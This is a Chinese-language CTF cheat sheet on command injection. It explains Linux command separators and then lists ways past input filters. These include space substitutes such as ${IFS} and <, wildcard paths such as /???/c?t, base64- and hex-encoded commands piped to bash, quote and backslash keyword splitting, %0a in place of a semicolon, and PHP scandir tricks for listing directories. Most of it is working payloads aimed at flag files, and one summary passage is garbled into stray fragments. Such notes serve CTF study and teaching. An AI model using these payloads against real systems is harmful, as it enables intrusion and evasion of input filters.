命令执行函数
eval
?@System
Assert
命令执行
linux命令分号&&和&,|和||的用法。
- “;”分号用法
方式:command1 ; command2
用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。
彼此不关联
- “| ”管道符用法
上一条命令的输出,作为下一条命令参数。ctf里面:ping 127.0.0.1 | ls(只执行ls不执行前面的)
方式:command1 | command
Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。
利用一个管道:
# rpm -qa|grep licq
这条命令使用一个管道符“|”建立了一个管道。管道将rpm -qa命令的输出(包括系统中所有安装的RPM包)作为grep命令的输入,从而列出带有licq字符的RPM包来。
利用多个管道:
# cat /etc/passwd | grep /bin/bash | wc -l
这条命令使用了两个管道,利用第一个管道将cat命令(显示passwd文件的内容)的输出送给grep命令,grep命令找出含有“/bin /bash”的所有行;第二个管道将grep的输出送给wc命令,wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash。
- “&”符号用法
ctf中用法 ping 127.0.0.1 & ls(先执行ls后执行ping)
&放在启动参数后面表示设置此进程为后台进程
方式:command1 &
默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个’&'实现这个目的。
- “&&”符号用法
ctf中用法 ping 127.0.0.1 && ls(ping命令正确才执行ls 要是ping 1 && ls ls就不会执行)
shell 在执行某个命令的时候,会返回一个返回值,该返回值保存在 shell 变量 $? 中。当 $? == 0 时,表示执行成功;当 $? == 1 时(我认为是非0的数,返回值在0-255间),表示执行失败。
有时候,下一条命令依赖前一条命令是否执行成功。如:在成功地执行一条命令之后再执行另一条命令,或者在一条命令执行失败后再执行另一条命令等。shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。
语法格式如下:
command1 && command2 [&& command3 …]
命令之间使用 && 连接,实现逻辑与的功能。
只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才会被执行。
只要有一个命令返回假(命令返回值 $? == 1),后面的命令就不会被执行。
- “||”符号用法
和&&相反 左边为假才执行命令二
逻辑或的功能
语法格式如下:
command1 || command2 [|| command3 …]命令之间使用 || 连接,实现逻辑或的功能。
只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才会被执行。这和 c 语言中的逻辑或语法功能相同,即实现短路逻辑或操作。
只要有一个命令返回真(命令返回值 $? == 0),后面的命令就不会被执行。–直到返回真的地方停止执行。
绕过空格
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
ca\t fl\ag
通配符绕过
???在linux里面可以进行代替字母
/???/c?t flag.txt
*在linux里面可以进行模糊匹配
cat flag.* *进行模糊匹配php
?
代表一个字符*
代表一串字符
代替cat
cat:由第一行开始显示内容,并将所有内容输出
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件
dir来查看当前目录文件
编码绕过
base64:
echo YWJjZGU=|base64 -d //打印出来abcde
echo Y2F0IGZhbGcucGhw|base64 -d|bash //cat flag.php
echo Y2F0IGZhbGcucGhw|base64 -d|sh //cat flag.php
hex编码绕过:
echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.ph
unicode编码
$(printf “\154\163”) //ls
$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat flag.php
对于关键字还可以用单引号和反斜杠绕过 比如 cat fl’'ag cat fl\ag
总结一下,payload1;a=ag.php;b=fl;cat$IFS
1
1
1b
a
和
c
a
t
a和 cat
a和catIFS$1ls
得到的flag查看源码。
引号绕过
关键字被过滤时,可以在单词中插入单引号、双引号、反引号、反斜杠来绕过:
c'at'|c"at"|c``at|c\at
内联执行
cat `ls`
过滤分号
可以用||或者%0a代替,%0a与上面%09同理
过滤所有字母
/bin目录下不止cat一个命令,还有很多,可以利用有数字的配合通配符来输出内容,例如base64,还有/usr/bin下,例如bzip2
/???/???64 ???.??? # /bin/base64 flag.php
/???/???/???2 ???.??? # /usr/bin/bzip2 flag.php 访问url/flag.php.bz2就能下载
八进制,
若题目中过滤了[] 、; 、()
include$_GET{1}?>
函数绕过
print_r(scandir(pos(localeconv()))) //当前目录
print_r(scandir(’/’)) //查看根目录文件
输出目录中倒数第二个文件内容:
print_r(next(array_reverse(scandir(pos(localeconv())))))
绕过长度限制
>
和>>
两个符号的使用
使用>
命令会将原有文件内容覆盖,如果是存入不存在的文件名,那么就会新建文件再存入
>>
符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容
总结
管道符:
; | & && || %0a %09
关键字过滤:
ls:dir ls-l=ll l‘s
cat过滤:
tac more less curl nl tail sort strings head paste od -a
空格过滤:
${IFS} $IFS$9 < <> ca\t fl\ag %00 %09
[a-z] [A-Z] [0-9]过滤:
大小写互相替换使用,二八十六进制绕过
全过滤:
url编码,八进制,十六进制
目录间隔符:
cd进入